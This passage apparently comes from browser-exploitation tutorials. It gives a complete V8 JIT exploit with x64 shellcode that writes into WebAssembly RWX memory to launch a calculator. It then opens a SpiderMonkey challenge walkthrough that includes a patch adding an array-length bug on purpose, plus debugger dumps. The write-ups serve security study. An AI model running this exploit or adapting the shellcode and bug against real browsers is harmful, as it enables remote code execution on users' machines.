0x00002fac7911ec18    0x0000000000000000    
0x00002fac7911ec20    0x0000087e7c50a000    JumpTableStart [RWX]
0x00002fac7911ec28    0x0000556b3a47c250    
0x00002fac7911ec30    0x0000556b3a47afa0    
0x00002fac7911ec38    0x0000556b3a47afc0    
----- [ TUPLE2_TYPE : 0x18 ] -----
0x00002fac7911ec40    0x00000cdfc00827c9    MAP_TYPE    
0x00002fac7911ec48    0x00002fac7911eb29    WASM_INSTANCE_TYPE    
0x00002fac7911ec50    0x00002073d820b849    JS_FUNCTION_TYPE    
----- [ WASM_MEMORY_TYPE : 0x30 ] -----
0x00002fac7911ec58    0x00001024ebc89e11    MAP_TYPE    
0x00002fac7911ec60    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
0x00002fac7911ec68    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
52417812097833

That gives us the following offsets:

let WasmOffsets = { 
  shared_function_info : 3,
  wasm_exported_function_data : 1,
  wasm_instance : 2,
  jump_table_start : 31
};

Now simply find the JumpTableStart pointer and modify your crafted ArrayBuffer to overwrite this memory and copy your shellcode into it. Of course, you may want to back the memory up first so as to restore it afterwards!
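
That backup/restore step is not shown in the final exploit; a small sketch of it, reusing the exploit's variable names, could look like this (note that the calculator shellcode below ends with an infinite loop, so restoring only makes sense with a payload that actually returns):

view[4] = jump_table_start; // point the fake backing_store at the RWX page
let rwx = new Uint8Array(packed_elements_array[1]);

let saved = rwx.slice(0, shellcode.length); // backup the original bytes
rwx.set(shellcode);                         // write the payload
get_pwnd();                                 // execute it...
rwx.set(saved);                             // ...then restore the jump table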

Full exploit

The full exploit looks like this:

// spawn gnome calculator
let shellcode = [0xe8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x59, 0x49, 0x81, 0xe9, 0x05, 0x00, 0x00, 0x00, 0xb8, 0x01, 0x01, 0x00, 0x00, 0xbf, 0x6b, 0x00, 0x00, 0x00, 0x49, 0x8d, 0xb1, 0x61, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x20, 0x00, 0x0f, 0x05, 0x48, 0x89, 0xc7, 0xb8, 0x51, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x49, 0x8d, 0xb9, 0x62, 0x00, 0x00, 0x00, 0xb8, 0xa1, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xb8, 0x3b, 0x00, 0x00, 0x00, 0x49, 0x8d, 0xb9, 0x64, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x57, 0x48, 0x89, 0xe6, 0x49, 0x8d, 0x91, 0x7e, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x52, 0x48, 0x89, 0xe2, 0x0f, 0x05, 0xeb, 0xfe, 0x2e, 0x2e, 0x00, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x67, 0x6e, 0x6f, 0x6d, 0x65, 0x2d, 0x63, 0x61, 0x6c, 0x63, 0x75, 0x6c, 0x61, 0x74, 0x6f, 0x72, 0x00, 0x44, 0x49, 0x53, 0x50, 0x4c, 0x41, 0x59, 0x3d, 0x3a, 0x30, 0x00];

let WasmOffsets = { 
  shared_function_info : 3,
  wasm_exported_function_data : 1,
  wasm_instance : 2,
  jump_table_start : 31
};

let log = this.print;

let ab = new ArrayBuffer(8);
let fv = new Float64Array(ab);
let dv = new BigUint64Array(ab);

let f2i = (f) => {
  fv[0] = f;
  return dv[0];
}

let i2f = (i) => {
  dv[0] = BigInt(i);
  return fv[0];
}

let tagFloat = (f) => {
  fv[0] = f;
  dv[0] += 1n;
  return fv[0];
}

let hexprintablei = (i) => {
  return (i).toString(16).padStart(16,"0");
}

let assert = (l,r,m) => {
  if (l != r) {
    log(hexprintablei(l) + " != " +  hexprintablei(r));
    log(m);
    throw "failed assert";
  }
  return true;
}

let NEW_LENGTHSMI = 0x64;
let NEW_LENGTH64  = 0x0000006400000000;

let AB_LENGTH = 0x100;

let MARK1SMI = 0x13;
let MARK2SMI = 0x37;
let MARK1 = 0x0000001300000000;
let MARK2 = 0x0000003700000000;

let ARRAYBUFFER_SIZE = 0x40;
let PTR_SIZE = 8;

let opt_me = (x) => {
  let MAGIC = 1.1; // don't move out of scope
  let arr = new Array(MAGIC,MAGIC,MAGIC);
  arr2 = Array.of(1.2); // allows to put the JSArray *before* the fixed arrays
  evil_ab = new ArrayBuffer(AB_LENGTH);
  packed_elements_array = Array.of(MARK1SMI,Math,MARK2SMI, get_pwnd);
  let y = (x == "foo") ? 4503599627370495 : 4503599627370493;
  let z = 2 + y + y ; // 2 + 4503599627370495 * 2 = 9007199254740992
  z = z + 1 + 1 + 1;
  z = z - (4503599627370495*2); 

  // may trigger the OOB R/W

  let leak = arr[z];
  arr[z] = i2f(NEW_LENGTH64); // try to corrupt arr2.length

  //  when leak == MAGIC, we are ready to exploit

  if (leak != MAGIC) {

    // [1] we should have corrupted arr2.length, we want to check it

    assert(f2i(leak), 0x0000000100000000, "bad layout for jsarray length corruption");
    assert(arr2.length, NEW_LENGTHSMI);

    log("[+] corrupted JSArray's length");

    // [2] now read evil_ab ArrayBuffer structure to prepare our fake array buffer

    let ab_len_idx = arr2.indexOf(i2f(AB_LENGTH));

    // check if the memory layout is consistent

    assert(ab_len_idx != -1, true, "could not find array buffer");
    assert(Number(f2i(arr2[ab_len_idx + 1])) & 1, false);
    assert(Number(f2i(arr2[ab_len_idx + 1])) > 0x10000, true);
    assert(f2i(arr2[ab_len_idx + 2]), 2);

    let ibackingstore_ptr = f2i(arr2[ab_len_idx + 1]);
    let fbackingstore_ptr = arr2[ab_len_idx + 1];

    // copy the array buffer so as to prepare a good looking fake array buffer

    let view = new BigUint64Array(evil_ab);
    for (let i = 0; i < ARRAYBUFFER_SIZE / PTR_SIZE; ++i) {
      view[i] = f2i(arr2[ab_len_idx-3+i]);
    }

    log("[+] Found backingstore pointer : " + hexprintablei(ibackingstore_ptr));

    // [3] corrupt packed_elements_array to replace the pointer to the Math object
    // by a pointer to our fake object located in our evil_ab array buffer

    let magic_mark_idx = arr2.indexOf(i2f(MARK1));
    assert(magic_mark_idx != -1, true, "could not find object pointer mark");
    assert(f2i(arr2[magic_mark_idx+2]) == MARK2, true);
    arr2[magic_mark_idx+1] = tagFloat(fbackingstore_ptr);

    // [4] leak wasm function pointer 

    let ftagged_wasm_func_ptr = arr2[magic_mark_idx+3]; // we want to read get_pwnd

    log("[+] wasm function pointer at 0x" + hexprintablei(f2i(ftagged_wasm_func_ptr)));
    view[4] = f2i(ftagged_wasm_func_ptr)-1n;

    // [5] use RW primitive to find WASM RWX memory


    let rw_view = new BigUint64Array(packed_elements_array[1]);
    let shared_function_info = rw_view[WasmOffsets.shared_function_info];
    view[4] = shared_function_info - 1n; // detag pointer

    rw_view = new BigUint64Array(packed_elements_array[1]);
    let wasm_exported_function_data = rw_view[WasmOffsets.wasm_exported_function_data];
    view[4] = wasm_exported_function_data - 1n; // detag

    rw_view = new BigUint64Array(packed_elements_array[1]);
    let wasm_instance = rw_view[WasmOffsets.wasm_instance];
    view[4] = wasm_instance - 1n; // detag

    rw_view = new BigUint64Array(packed_elements_array[1]);
    let jump_table_start = rw_view[WasmOffsets.jump_table_start]; // raw pointer, no detag needed

    assert(jump_table_start > 0x10000n, true);
    assert(jump_table_start & 0xfffn, 0n); // should look like an aligned pointer

    log("[+] found RWX memory at 0x" + jump_table_start.toString(16));

    view[4] = jump_table_start;
    rw_view = new Uint8Array(packed_elements_array[1]);

    // [6] write shellcode in RWX memory

    for (let i = 0; i < shellcode.length; ++i) {
      rw_view[i] = shellcode[i];
    }

    // [7] PWND!

    let res = get_pwnd();

    print(res);

  }
  return leak;
}

(() => {
  assert(this.alert, undefined); // only v8 is supported
  assert(this.version().includes("7.3.0"), true); // only tested on version 7.3.0
  // exploit is the same for both windows and linux, only shellcodes have to be changed 
  // architecture is expected to be 64 bits
})()

// needed for RWX memory

load("wasm.js");

opt_me("");
for (var i = 0; i < 0x10000; ++i) // trigger optimization
  opt_me("");
let res = opt_me("foo");

[figure: the calculator popped by the exploit]

Conclusion

I hope you enjoyed this article and thank you very much for reading :-) If you have any feedback or questions, just contact me on my twitter @__x86.

Special thanks to my friends 0vercl0k and yrp604 for their review!

Kudos to the awesome v8 team. You guys are doing amazing work!

Recommended reading

Introduction to SpiderMonkey exploitation.

Introduction

This blogpost covers the development of three exploits targeting the SpiderMonkey JavaScript shell interpreter and Mozilla Firefox on Windows 10 RS5 64-bit, from the perspective of somebody who has never written a browser exploit nor looked closely at any JavaScript engine codebase.

As you have probably noticed, there has been a LOT of interest in exploiting browsers in the past year or two. Every major CTF competition has at least one browser challenge, and every month there are at least a write-up or two touching on browser exploitation. It is just everywhere. That is kind of why I figured I should have a little look at what a JavaScript engine looks like from inside the guts, and exploit one of them. I have picked Firefox's SpiderMonkey JavaScript engine and the Blazefox challenge written by itszn13.

In this blogpost, I present my findings and the three exploits I have written during this quest. Originally, the challenge was targeting a Linux x64 environment and so naturally I decided to exploit it on Windows x64 :). Now you may wonder why three different exploits? Three different exploits allowed me to take it step by step and not face all the complexity at once. That is usually how I work day to day, I make something small work and iterate to build it up.

Here is how I organized things:

  • The first thing I wrote is a WinDbg JavaScript extension called sm.js that gives me visibility into a bunch of stuff in SpiderMonkey. It is also a good exercise to familiarize yourself with the various ways objects are organized in memory. It is not necessary, but it has been definitely useful when writing the exploits.

  • The first exploit, basic.js, targets a very specific build of the JavaScript interpreter, js.exe. It is full of hardcoded ugly offsets, and would have no chance to land elsewhere than on my system with this specific build of js.exe.

  • The second exploit, kaizen.js, is meant to be a net improvement over basic.js. It still targets the JavaScript interpreter itself, but this time it dynamically resolves a bunch of things like a big boy. It also uses the baseline JIT to have it generate ROP gadgets.

  • The third exploit, ifrit.js, finally targets the Firefox browser, with a little extra. Instead of just leveraging the baseline JIT to generate one or two ROP gadgets, we make it JIT a whole native code payload. No need to ROP, to scan for Windows API addresses, or to create a writable and executable memory region anymore. We just redirect the execution flow to our payload inside the JIT code. This might be the least dull / most interesting part for people who know SpiderMonkey and have been doing browser exploitation already :).

Before starting, for those who do not feel like reading through the whole post: TL;DR I have created a blazefox GitHub repository that you can clone with all the materials. In the repository you can find:

  • sm.js which is the debugger extension mentioned above,
  • The source code of the three exploits in exploits,
  • A 64-bit debug build of the JavaScript shell along with private symbol information in js-asserts.7z, and a release build in js-release.7z,
  • The scripts I used to build the Bring Your Own Payload technique in scripts,
  • The sources that have been used to build js-release so that you can do source-level debugging in WinDbg in src/js,
  • A 64-bit build of the Firefox binaries along with private symbol information for xul.dll in ff-bin.7z.001 and ff-bin.7z.002.

All right, let's buckle up and hit the road now!

Setting it up

Naturally, we are going to have to set up a debugging environment. I would suggest creating a virtual machine for this, as you are going to have to install a bunch of stuff you might not want to install on your personal machine.

First things first, let's get the code. Mozilla uses Mercurial for development, but they also maintain a read-only git mirror. I recommend just shallow-cloning this repository to make it faster (the repository is about ~420MB):

>git clone --depth 1 https://github.com/mozilla/gecko-dev.git
Cloning into 'gecko-dev'...
remote: Enumerating objects: 264314, done.
remote: Counting objects: 100% (264314/264314), done.
remote: Compressing objects: 100% (211568/211568), done.
remote: Total 264314 (delta 79982), reused 140844 (delta 44268), pack-reused 0 receiving objects: 100% (264314/26431
Receiving objects: 100% (264314/264314), 418.27 MiB | 981.00 KiB/s, done.
Resolving deltas: 100% (79982/79982), done.
Checking out files: 100% (261054/261054), done.

Sweet. For now we are only interested in building the JavaScript shell interpreter that is part of the SpiderMonkey tree. js.exe is a simple command-line utility that can run JavaScript code. It is much faster to compile and, more importantly, easier to attack and reason about. We are about to be dropped in a sea of code, so let's focus on something smaller first.

Before compiling though, grab the blaze.patch file (no need to understand it just yet):

diff -r ee6283795f41 js/src/builtin/Array.cpp
--- a/js/src/builtin/Array.cpp  Sat Apr 07 00:55:15 2018 +0300
+++ b/js/src/builtin/Array.cpp  Sun Apr 08 00:01:23 2018 +0000
@@ -192,6 +192,20 @@
     return ToLength(cx, value, lengthp);
 }

+static MOZ_ALWAYS_INLINE bool
+BlazeSetLengthProperty(JSContext* cx, HandleObject obj, uint64_t length)
+{
+    if (obj->is<ArrayObject>()) {
+        obj->as<ArrayObject>().setLengthInt32(length);
+        obj->as<ArrayObject>().setCapacityInt32(length);
+        obj->as<ArrayObject>().setInitializedLengthInt32(length);
+        return true;
+    }
+    return false;
+}
+
+
+
 /*
  * Determine if the id represents an array index.
  *
@@ -1578,6 +1592,23 @@
     return DenseElementResult::Success;
 }

+bool js::array_blaze(JSContext* cx, unsigned argc, Value* vp)
+{
+    CallArgs args = CallArgsFromVp(argc, vp);
+    RootedObject obj(cx, ToObject(cx, args.thisv()));
+    if (!obj)
+        return false;
+
+    if (!BlazeSetLengthProperty(cx, obj, 420))
+        return false;
+
+    //uint64_t l = obj.as<ArrayObject>().setLength(cx, 420);
+
+    args.rval().setObject(*obj);
+    return true;
+}
+
+
 // ES2017 draft rev 1b0184bc17fc09a8ddcf4aeec9b6d9fcac4eafce
 // 22.1.3.21 Array.prototype.reverse ( )
 bool
@@ -3511,6 +3542,8 @@
     JS_FN("unshift",            array_unshift,      1,0),
     JS_FNINFO("splice",         array_splice,       &array_splice_info, 2,0),

+    JS_FN("blaze",            array_blaze,      0,0),
+
     /* Pythonic sequence methods. */
     JS_SELF_HOSTED_FN("concat",      "ArrayConcat",      1,0),
     JS_INLINABLE_FN("slice",    array_slice,        2,0, ArraySlice),
diff -r ee6283795f41 js/src/builtin/Array.h
--- a/js/src/builtin/Array.h    Sat Apr 07 00:55:15 2018 +0300
+++ b/js/src/builtin/Array.h    Sun Apr 08 00:01:23 2018 +0000
@@ -166,6 +166,9 @@
 array_reverse(JSContext* cx, unsigned argc, js::Value* vp);

 extern bool
+array_blaze(JSContext* cx, unsigned argc, js::Value* vp);
+
+extern bool
 array_splice(JSContext* cx, unsigned argc, js::Value* vp);

 extern const JSJitInfo array_splice_info;
diff -r ee6283795f41 js/src/vm/ArrayObject.h
--- a/js/src/vm/ArrayObject.h   Sat Apr 07 00:55:15 2018 +0300
+++ b/js/src/vm/ArrayObject.h   Sun Apr 08 00:01:23 2018 +0000
@@ -60,6 +60,14 @@
         getElementsHeader()->length = length;
     }

+    void setCapacityInt32(uint32_t length) {
+        getElementsHeader()->capacity = length;
+    }
+
+    void setInitializedLengthInt32(uint32_t length) {
+        getElementsHeader()->initializedLength = length;
+    }
+
     // Make an array object with the specified initial state.
     static inline ArrayObject*
     createArray(JSContext* cx,

Apply the patch as shown below and double-check that it has been properly applied (you should not run into any conflicts):

>cd gecko-dev\js

gecko-dev\js>git apply c:\work\codes\blazefox\blaze.patch

gecko-dev\js>git diff
diff --git a/js/src/builtin/Array.cpp b/js/src/builtin/Array.cpp
index 1655adbf58..e2ee96dd5e 100644
--- a/js/src/builtin/Array.cpp
+++ b/js/src/builtin/Array.cpp
@@ -202,6 +202,20 @@ GetLengthProperty(JSContext* cx, HandleObject obj, uint64_t* lengthp)
     return ToLength(cx, value, lengthp);
 }

+static MOZ_ALWAYS_INLINE bool
+BlazeSetLengthProperty(JSContext* cx, HandleObject obj, uint64_t length)
+{
+    if (obj->is<ArrayObject>()) {
+        obj->as<ArrayObject>().setLengthInt32(length);
+        obj->as<ArrayObject>().setCapacityInt32(length);
+        obj->as<ArrayObject>().setInitializedLengthInt32(length);
+        return true;
+    }
+    return false;
+}

At this point you can install Mozilla-Build, a meta-installer that provides every tool necessary for Mozilla development (toolchain, various scripts, etc.). The latest available version at the time of writing is version 3.2, which is available here: MozillaBuildSetup-3.2.exe.

Once this is installed, start up a Mozilla shell by running the start-shell.bat batch file. Go to the js\src folder of your clone and type the following to configure an x64 debug build of js.exe:

over@compiler /d/gecko-dev/js/src$ autoconf-2.13

over@compiler /d/gecko-dev/js/src$ mkdir build.asserts

over@compiler /d/gecko-dev/js/src$ cd build.asserts

over@compiler /d/gecko-dev/js/src/build.asserts$ ../configure --host=x86_64-pc-mingw32 --target=x86_64-pc-mingw32 --enable-debug

Kick off the compilation with mozmake:

over@compiler /d/gecko-dev/js/src/build.asserts$ mozmake -j2

Then, you should be able to toss ./js/src/js.exe, ./mozglue/build/mozglue.dll and ./config/external/nspr/pr/nspr4.dll in a directory and voilà:

over@compiler ~/mozilla-central/js/src/build.asserts/js/src
$ js.exe --version
JavaScript-C64.0a1

For an optimized build you can invoke configure this way:

over@compiler /d/gecko-dev/js/src/build.opt$ ../configure --host=x86_64-pc-mingw32 --target=x86_64-pc-mingw32 --disable-debug --enable-optimize

SpiderMonkey

Background

SpiderMonkey is the name of Mozilla's JavaScript engine; its source code is available on GitHub via the gecko-dev repository (under the js directory). SpiderMonkey is used by Firefox, and more precisely by Gecko, its web engine. You can even embed the interpreter in your own third-party applications if you fancy it. The project is fairly big; here are some rough stats about it:

  • ~3k Classes,
  • ~576k Lines of code,
  • ~1.2k Files,
  • ~48k Functions.

As you can see on the tree map view below (the bigger, the more lines; the darker the blue, the higher the cyclomatic complexity), the engine is basically split into six big parts: the JIT compilers, called Baseline and IonMonkey, in the jit directory; the front-end in the frontend directory; the JavaScript virtual machine in the vm directory; a bunch of builtins in the builtin directory; a garbage collector in the gc directory; and... WebAssembly in the wasm directory.

[figure: treemap of the SpiderMonkey sources; size = line count, darker blue = higher cyclomatic complexity]

Most of the stuff I have looked at so far lives in the vm, builtin and gc folders. Another good thing going for us is that there is a fair amount of public documentation about SpiderMonkey: its internals, design, etc.

Here are a few links that I found interesting (some might be out of date, but at this point we are just trying to digest every bit of public information we can find) if you would like to get even more background before going further:

JS::Values and JSObjects

The first thing you might be curious about is how native JavaScript objects are laid out in memory. Let's create a small script file with a few different native types and dump them directly from memory (do not forget to load the symbols). Before doing that, a useful trick to know is to set a breakpoint on a function that is rarely called, like Math.atan2 for example. As you can pass arbitrary JavaScript objects to the function, it is then very easy to retrieve their addresses from inside the debugger. You can also use objectAddress, which is only accessible in the shell but is very useful at times.

js> a = {}
({})

js> objectAddress(a)
"000002576F8801A0"

Another pretty useful method is dumpObject but this one is only available from a debug build of the shell:

js> a = {doare : 1}
({doare:1})

js> dumpObject(a)
object 20003e8e160
  global 20003e8d060 [global]
  class 7ff624d94218 Object
  lazy group
  flags:
  proto <Object at 20003e90040>
  properties:
    "doare": 1 (shape 20003eb1ad8 enumerate slot 0)

There are a bunch of other potentially interesting utility functions exposed to JavaScript via the shell; if you would like to enumerate them, you can run Object.getOwnPropertyNames(this):

js> Object.getOwnPropertyNames(this)
["undefined", "Boolean", "JSON", "Date", "Math", "Number", "String", "RegExp", "InternalError", "EvalError", "RangeError", "TypeError", "URIError", "ArrayBuffer", "Int8Array", "Uint8Array", "Int16Array", "Uint16Array", "Int32Array", "Uint32Array", "Float32Array", "Float64Array", "Uint8ClampedArray", "Proxy", "WeakMap", "Map", ..]

To break in the debugger when the Math.atan2 JavaScript function is called you can set a breakpoint on the below symbol:

0:001> bp js!js::math_atan2

Now just create a foo.js file with the following content:

'use strict';

const Address = Math.atan2;

const A = 0x1337;
Address(A);

const B = 13.37;
Address(B);

const C = [1, 2, 3, 4, 5];
Address(C);

At this point you have two choices: either load the above script into the JavaScript shell and attach a debugger, or (what I encourage) trace the program execution with TTD. It makes things so much easier when you are trying to investigate complex software. If you have never tried it, do it now and you will understand.

Time to load the trace and have a look around:

0:001> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff6`9b3fe140 56              push    rsi

0:000> lsa .
   260: }
   261: 
   262: bool
   263: js::math_atan2(JSContext* cx, unsigned argc, Value* vp)
>  264: {
   265:     CallArgs args = CallArgsFromVp(argc, vp);
   266: 
   267:     return math_atan2_handle(cx, args.get(0), args.get(1), args.rval());
   268: }
   269: 

At this point you should be broken into the debugger like in the above. To be able to inspect the passed JavaScript object, we need to understand how JavaScript arguments are passed to native C++ function.

The way it works is that vp is a pointer to an array of JS::Values of size argc + 2 (one slot is reserved for the callee / return value and one for the this object). Functions usually do not access the array via vp directly; they wrap it in a JS::CallArgs object that abstracts away the need to calculate the number of JS::Values, as well as providing useful functionality like JS::CallArgs::get, JS::CallArgs::rval, etc. It also abstracts away GC-related operations to properly keep the objects alive. So let's just dump the memory pointed to by vp:

0:000> dqs @r8 l@rdx+2
0000028f`87ab8198  fffe028f`877a9700
0000028f`87ab81a0  fffe028f`87780180
0000028f`87ab81a8  fff88000`00001337

First thing we notice is that every Value object seems to have its high bits set. Usually, that is a sign of clever hax to encode more information (the type?) in a pointer, as this part of the address space is not addressable from user-mode on Windows.

At least we recognize the 0x1337 value, which is something. Let's move on to the second invocation of Address now:

0:000> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff6`9b3fe140 56              push    rsi

0:000> dqs @r8 l@rdx+2
0000028f`87ab8198  fffe028f`877a9700
0000028f`87ab81a0  fffe028f`87780180
0000028f`87ab81a8  402abd70`a3d70a3d

0:000> .formats 402abd70`a3d70a3d
Evaluate expression:
  Hex:     402abd70`a3d70a3d
  Double:  13.37

Another constant we recognize. This time, the entire quad-word is used to represent the double value. And finally, here is the Array object passed to the third invocation of Address:

0:000> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff6`9b3fe140 56              push    rsi

0:000> dqs @r8 l@rdx+2
0000028f`87ab8198  fffe028f`877a9700
0000028f`87ab81a0  fffe028f`87780180
0000028f`87ab81a8  fffe028f`87790400

Interesting. Well, if we look at the JS::Value structure it sounds like the lower part of the quad-word is a pointer to some object.

0:000> dt -r2 js::value
   +0x000 asBits_          : Uint8B
   +0x000 asDouble_        : Float
   +0x000 s_               : JS::Value::<unnamed-type-s_>
      +0x000 payload_         : JS::Value::<unnamed-type-s_>::<unnamed-type-payload_>
         +0x000 i32_             : Int4B
         +0x000 u32_             : Uint4B
         +0x000 why_             : JSWhyMagic

By looking at public/Value.h we quickly understand what is going on with what we have seen above. The upper 17 bits (referred to as the JSVAL_TAG in the source code) of a JS::Value are used to encode type information. The lower 47 bits (JSVAL_TAG_SHIFT is the shift amount) are either the value of a trivial type (integer, boolean, etc.) or a pointer to a JSObject. This part is called the payload_.

union alignas(8) Value {
  private:
    uint64_t asBits_;
    double asDouble_;

    struct {
        union {
            int32_t i32_;
            uint32_t u32_;
            JSWhyMagic why_;
        } payload_;
    } s_;
    // [...]
};

Now let's take for example the JS::Value 0xfff8800000001337. To extract its tag, we can right-shift it by 47; to extract the payload (an integer here, a trivial type), we can mask it with 2**47 - 1. Same with the Array JS::Value from above.

In [5]: v = 0xfff8800000001337

In [6]: hex(v >> 47)
Out[6]: '0x1fff1L'

In [7]: hex(v & ((2**47) - 1))
Out[7]: '0x1337L'

In [8]: v = 0xfffe028f877a9700 

In [9]: hex(v >> 47)
Out[9]: '0x1fffcL'

In [10]: hex(v & ((2**47) - 1))
Out[10]: '0x28f877a9700L'

jsvalue_taggedpointer

The 0x1fff1 constant from above is JSVAL_TAG_INT32 and 0x1fffc is JSVAL_TAG_OBJECT as defined in JSValueType which makes sense:

enum JSValueType : uint8_t
{
    JSVAL_TYPE_DOUBLE              = 0x00,
    JSVAL_TYPE_INT32               = 0x01,
    JSVAL_TYPE_BOOLEAN             = 0x02,
    JSVAL_TYPE_UNDEFINED           = 0x03,
    JSVAL_TYPE_NULL                = 0x04,
    JSVAL_TYPE_MAGIC               = 0x05,
    JSVAL_TYPE_STRING              = 0x06,
    JSVAL_TYPE_SYMBOL              = 0x07,
    JSVAL_TYPE_PRIVATE_GCTHING     = 0x08,
    JSVAL_TYPE_OBJECT              = 0x0c,

    // These never appear in a jsval; they are only provided as an out-of-band
    // value.
    JSVAL_TYPE_UNKNOWN             = 0x20,
    JSVAL_TYPE_MISSING             = 0x21
};

JS_ENUM_HEADER(JSValueTag, uint32_t)
{
    JSVAL_TAG_MAX_DOUBLE           = 0x1FFF0,
    JSVAL_TAG_INT32                = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_INT32,
    JSVAL_TAG_UNDEFINED            = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_UNDEFINED,
    JSVAL_TAG_NULL                 = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_NULL,
    JSVAL_TAG_BOOLEAN              = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_BOOLEAN,
    JSVAL_TAG_MAGIC                = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_MAGIC,
    JSVAL_TAG_STRING               = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_STRING,
    JSVAL_TAG_SYMBOL               = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_SYMBOL,
    JSVAL_TAG_PRIVATE_GCTHING      = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_PRIVATE_GCTHING,
    JSVAL_TAG_OBJECT               = JSVAL_TAG_MAX_DOUBLE | JSVAL_TYPE_OBJECT
} JS_ENUM_FOOTER(JSValueTag);

Now that we know what a JS::Value is, let's have a look at what an Array looks like in memory, as this will become useful later. Restart the target and skip the first two breaks:

0:000> .restart /f

0:008> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff6`9b3fe140 56              push    rsi

0:000> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff6`9b3fe140 56              push    rsi

0:000> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff6`9b3fe140 56              push    rsi

0:000> dqs @r8 l@rdx+2
0000027a`bf5b8198  fffe027a`bf2a9480
0000027a`bf5b81a0  fffe027a`bf280140
0000027a`bf5b81a8  fffe027a`bf2900a0

0:000> dqs 27a`bf2900a0
0000027a`bf2900a0  0000027a`bf27ab20
0000027a`bf2900a8  0000027a`bf2997e8
0000027a`bf2900b0  00000000`00000000
0000027a`bf2900b8  0000027a`bf2900d0
0000027a`bf2900c0  00000005`00000000
0000027a`bf2900c8  00000005`00000006
0000027a`bf2900d0  fff88000`00000001
0000027a`bf2900d8  fff88000`00000002
0000027a`bf2900e0  fff88000`00000003
0000027a`bf2900e8  fff88000`00000004
0000027a`bf2900f0  fff88000`00000005
0000027a`bf2900f8  4f4f4f4f`4f4f4f4f

At this point we recognize the content of the array: it contains the five integers from 1 to 5, encoded as JS::Values. We can also kind of see what could potentially be a size and a capacity, but it is hard to guess the rest.

0:000> dt JSObject
   +0x000 group_           : js::GCPtr<js::ObjectGroup *>
   +0x008 shapeOrExpando_  : Ptr64 Void

0:000> dt js::NativeObject
   +0x000 group_           : js::GCPtr<js::ObjectGroup *>
   +0x008 shapeOrExpando_  : Ptr64 Void
   +0x010 slots_           : Ptr64 js::HeapSlot
   +0x018 elements_        : Ptr64 js::HeapSlot

0:000> dt js::ArrayObject
   +0x000 group_           : js::GCPtr<js::ObjectGroup *>
   +0x008 shapeOrExpando_  : Ptr64 Void
   +0x010 slots_           : Ptr64 js::HeapSlot
   +0x018 elements_        : Ptr64 js::HeapSlot

The js::ArrayObject is defined in the vm/ArrayObject.h file and subclasses the js::NativeObject class (js::NativeObject subclasses js::ShapedObject, which naturally subclasses JSObject). Note that js::NativeObject is also basically subclassed by every other JavaScript object, as you can see in the below diagram:

Butterfly-NativeObject.png

A native object in SpiderMonkey is basically made of two components:

  1. a shape object, pointed to by the shapeOrExpando_ field, which is used to describe the properties and the class of the said object (more on that just a bit below),
  2. storage to store elements or the values of properties.

Let's switch gears and have a look at how object properties are stored in memory.

Shapes

As mentioned above, the role of a shape object is to describe the various properties that an object has. You can, conceptually, think of it as some sort of hash table where the keys are the property names and the values are the slot numbers indicating where the property contents are actually stored.

Before reading further though, I recommend that you watch a very short presentation made by @bmeurer and @mathias describing how properties are stored in JavaScript engines: JavaScript engine fundamentals: Shapes and Inline Caches. As they did a very good job of explaining things clearly, it should help clear up what comes next and it also means I don't have to introduce things as much.

Consider the below JavaScript code:

'use strict';

const Address = Math.atan2;

const A = {
    foo : 1337,
    blah : 'doar-e'
};
Address(A);

const B = {
    foo : 1338,
    blah : 'sup'
};
Address(B);

const C = {
    foo : 1338,
    blah : 'sup'
};
C.another = true;
Address(C);

Throw it in the shell under your favorite debugger to have a closer look at this shape object:

0:000> bp js!js::math_atan2

0:000> g
Breakpoint 0 hit
Time Travel Position: D454:D
js!js::math_atan2:
00007ff7`76c9e140 56              push    rsi

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe01fc`e637e1c0

0:000> dt js::NativeObject 1fc`e637e1c0 shapeOrExpando_
   +0x008 shapeOrExpando_ : 0x000001fc`e63ae880 Void

0:000> ?? ((js::shape*)0x000001fc`e63ae880)
class js::Shape * 0x000001fc`e63ae880
   +0x000 base_            : js::GCPtr<js::BaseShape *>
   +0x008 propid_          : js::PreBarriered<jsid>
   +0x010 immutableFlags   : 0x2000001
   +0x014 attrs            : 0x1 ''
   +0x015 mutableFlags     : 0 ''
   +0x018 parent           : js::GCPtr<js::Shape *>
   +0x020 kids             : js::KidsPointer
   +0x020 listp            : (null) 

0:000> ?? ((js::shape*)0x000001fc`e63ae880)->propid_.value
struct jsid
   +0x000 asBits           : 0x000001fc`e63a7e20

In the implementation, a JS::Shape describes a single property; its name and slot number. To describe several of them, shapes are linked together via the parent field (and others). The slot number (which is used to find the property content later) is stored in the lower bits of the immutableFlags field. The property name is stored as a jsid in the propid_ field.

I understand this is a lot of abstract information thrown at your face right now. But let's peel the onion to clear things up, starting with a closer look at the above shape. This js::Shape object describes a property whose value is stored in slot number 1 (0x2000001 & SLOT_MASK). To get its name, we dump its propid_ field, which is 0x000001fce63a7e20.
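
For the curious, SLOT_MASK covers the lower 24 bits of immutableFlags (at least in this era's vm/Shape.h), so you can check the slot arithmetic directly in the shell:

js> (0x2000001 & 0xffffff)
1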

What is a jsid? A jsid is another type of tagged pointer where type information is encoded in the lower three bits this time.

jsid

Thanks to those lower bits, we know that this address is pointing to a string, and it should match one of our property names :).

